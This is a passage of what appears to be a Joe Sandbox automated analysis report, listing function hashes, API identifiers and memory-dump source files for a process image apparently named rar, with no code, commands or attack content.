                                                                                                                                                                                                                                                                    • Instruction ID: 0124f06cbebf4eaf3c9df04e1706a8709cb9b81711081657508e098dd4d67d85
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CE02221B3849146EBF88B19C492FB923D0EF44F80F803039F80BC3A54EE2CC8488B44
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                                                    • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                                                    • Instruction ID: 25687b9c2a21f8eca6cd1b9d8f3ad00ead31824f0bbc03179d7256faa43ec177
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14E0B661E1A54242FE68ABB2A81917412D1EF48F48F0866B4D91DCA292EE3CAC49425C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 61a38848863585528245087ec57b3d7db4ec2e2857ebd3184b0d5b51585d670b
                                                                                                                                                                                                                                                                    • Instruction ID: 3ebb982c4bc36e3ee3e85541e33f73912261514aea2e8e7a79f7174714b20ab0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61a38848863585528245087ec57b3d7db4ec2e2857ebd3184b0d5b51585d670b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1E1E721A0C68281FF789A20D4442BE27E1EF41F88F4462B5DE5D8B7E6DE3D9C49C714
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 573272f0f587a5841e96f6de12058517ff70df0c9770e23d059943033ae7e521
                                                                                                                                                                                                                                                                    • Instruction ID: ede2e5aa9bc2df736f78cbf6ecdbe7f0b3fc27787634d272c4771e4f337b8cee
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 573272f0f587a5841e96f6de12058517ff70df0c9770e23d059943033ae7e521
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11514473528BD295E7109F34A8442ED37E8FB40F88F18427ADE884B79ADF389452C325
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3947729631-0
                                                                                                                                                                                                                                                                    • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                                                    • Instruction ID: 41299dadf90d4b9e0cfc29b4f15064322f6697043d5f66b845779923f8944e15
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED418C21E0964382FB789B55A45027922E1EF91F88F1066B9D90ECB6D1EF3CEC4DC348
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CommandLine
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3253501508-0
                                                                                                                                                                                                                                                                    • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                                                    • Instruction ID: 1acdd9c3da1b8ef563c97fef565a4d418226f1eaa38134d55dbda8f99ba740f3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D018013A0C642D5EA20EB16A4822BD56F0EF89F94F481479EE4D873AADE3DDD598304
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1825529933-0
                                                                                                                                                                                                                                                                    • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                                                    • Instruction ID: 58efd6ac7d7488170045d5f8d33f544028e3e574dd560d6adfa079aa20857373
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C01A76170C65285EA205F06A40406AE690FF49FC4F585574EF8D8BB5ACE3CD4468708
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                                                    • Instruction ID: 478e3785c574a00a89f97cf167c065c5814a918856c3bb28ecc1ef88c736ff16
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C014F51A0D64341FD7497665A4827A12D0DF44FDDF08A3B0ED2DC62E6ED3DEC09820D
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                                                                                                    • Opcode ID: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                                                                                                                                                                                                                                    • Instruction ID: c71589fa422e74bfd3a3e92de1203eeace018f16a9eb6586e0b878d5241aec17
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF086329082C195DA219B7551412F827A0DB06FB4F0853B9DE7C4B2C7CE5C98C89710
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                                                    • Instruction ID: 362c19e9d7a9684f1ec0ec83ffe4748e0315251b5fd1102855ff18070a9fc108
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44F0FE12B4D24245FE74ABB1595927512C0DF44FA8F4C2BB0ED2EC62C1EE7CEC49821C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                                                    • Instruction ID: c64be2f5aeb63e6e08d0f0257e63f2eb477a97ba08673fa0c3fe16e2e16e8cbe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE04650F1930280ED782A72285147902C09F6AF80E1476FACD1FDA382DD2EAC9D160A
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                    • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                                                    • Instruction ID: d04ab11bb66677c48abeb848c20e283994fb34f3bc65677f9d1e672cc70c29f5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00D09EA5E1A90785F764DB81E84573012E1FF54F99F4127B8C81D89551CFBD285C8708
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF695D17A8C), ref: 00007FF695CF4549
                                                                                                                                                                                                                                                                    Memory Dump Source
